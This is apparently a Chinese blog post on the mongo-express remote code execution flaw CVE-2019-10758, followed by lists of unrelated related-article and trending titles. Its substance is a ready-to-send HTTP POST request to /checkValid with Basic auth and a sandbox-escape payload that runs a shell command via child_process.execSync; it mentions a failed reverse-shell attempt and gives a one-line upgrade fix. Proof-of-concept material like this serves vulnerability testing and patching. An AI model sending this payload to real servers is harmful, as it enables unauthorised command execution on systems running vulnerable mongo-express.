直接发送如下数据包，即可执行代码this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“touch /tmp/success”)：

POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

反弹shell，无果

修复建议

升级mongo-express到0.54.0或更高版本。

mongo-express 远程代码执行漏洞（CVE-2019-10758）相关推荐

1. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

   此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

2. CVE-2021-1675: Windows Print Spooler远程代码执行漏洞

   ** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...

3. 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...

   奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...

4. CVE-2018-8174 IE浏览器远程代码执行漏洞

   0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...

5. Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告

   奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...

6. windows server 2012 远程连不上_CVE20201350 | Windows DNS Server远程代码执行漏洞通告

   0x00 漏洞概述 CVE   ID CVE-2020-1350 时     间 2020-07-15 类     型 RCE 等     级 严重 远程利用 是 影响范围 0x01 漏洞详情 微软于 ...

7. CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行漏洞

   报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-02 1 更新概览 1.漏洞简述新增360CERT对CVE-2021-34527( ...

8. 绿盟安全事件响应观察及远程代码执行漏洞

   人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件 中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不 ...

9. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)（MPS-2023-1376）

   漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

10. 微软远程桌面服务远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...

最新文章

1. FFmpeg中拉取rtsp视频流并缩放显示测试代码
2. 设计模式之Adapter（适配器）（转）
3. VMware虚拟机Ubuntu系统与物理机Windows 7系统共享文件夹
4. docker私有仓库harbor配置helm chart仓库(安装helm chart插件)
5. 微信红包随机数字_微信红包的随机算法
6. win 2008 server 更改远程桌面端口的方法
7. gwt入门和进阶_GWT入门
8. P5706 【深基2.例8】再分肥宅水（python3实现）
9. Tomcat 启动耗时严重
10. HTML五子棋人人对战源代码,五子棋C++源代码 单机 联机 人机对战 人人对战
11. vivado 使用DDS IP方法
12. s:radio 赋值取值和添加事件
13. 17. Store newed objects in smart pointers in standalone statements
14. hp1015驱动64位_惠普1015驱动官方下载|
15. [iuud8]ios不同版本下推送本地通知
16. WPS解决账号登录验证问题（软件抓包重写过验证通用方法）
17. 转载一篇ps更换背景色
18. 小米10性能再进化！小米带来国内安卓系统GPU驱动首次更新——初阶GPU及其驱动升级认识
19. 同济大学计算机科学与技术系,同济大学计算机科学与技术系简介_跨考网
20. HBase Shell 命令

热门文章

1. 主流微型计算机,主流微型计算机硬件系统维护
2. controll层跳转页面_java web开发中的各种层
3. 计算机二级选择题复习整理（公共基础部分）
4. 3 Convex functions
5. c语言ok未定义标识符,C语言中宏的相关知识 - osc_y7ckpzr9的个人空间 - OSCHINA - 中文开源技术交流社区...
6. 第十二届蓝桥杯省赛：试题 A: 卡片（Java）
7. Java泛型（1）--集合使用泛型Generic、自定义泛型、泛型在继承上的体现、通配符的使用
8. mysql AUTO_INC 是否锁_AUTO-INC锁的一些思考
9. 求立方根_「每日一学」数学七上：立方根的知识要点
10. CF :K 一个含n条边的带权无向连通图，q次查询，每次查询两点间的最短距离。...